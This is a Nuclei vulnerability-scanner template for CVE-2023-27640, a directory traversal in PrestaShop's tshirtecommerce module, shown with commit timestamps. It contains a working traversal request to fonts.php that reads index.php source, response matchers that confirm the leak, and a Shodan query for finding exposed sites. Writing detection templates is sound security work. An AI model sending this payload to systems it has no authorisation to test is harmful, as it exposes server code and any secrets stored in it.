nuclei-templates/http/cves/2023/CVE-2023-27640.yaml

29 lines
1022 B
YAML
Raw Normal View History

2023-12-31 16:09:36 +00:00
id: CVE-2023-27640
info:
name: PrestaShop tshirtecommerce Directory Traversal
author: MaStErChO
severity: high
description: |
"The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files."
reference:
- https://www.cvedetails.com/cve/CVE-2023-27640/
- https://security.friendsofpresta.org/module/2023/03/30/tshirtecommerce_cwe-22.html
metadata:
max-request: 1
product: tshirtecommerce
framework: prestashop
shodan-query: http.component:"prestashop"
tags: cve,cve2023,prestashop,lfi
http:
- method: GET
path:
- "{{BaseURL}}/tshirtecommerce/fonts.php?name=2&type=./../index.php"
matchers-condition: and
matchers:
2023-12-31 16:34:01 +00:00
- type: dsl
2023-12-31 16:09:36 +00:00
dsl:
- contains(base64_decode(body), "PrestaShop")
2023-12-31 16:34:01 +00:00
- type: dsl
2023-12-31 16:09:36 +00:00
dsl:
- contains(base64_decode(body), "?php")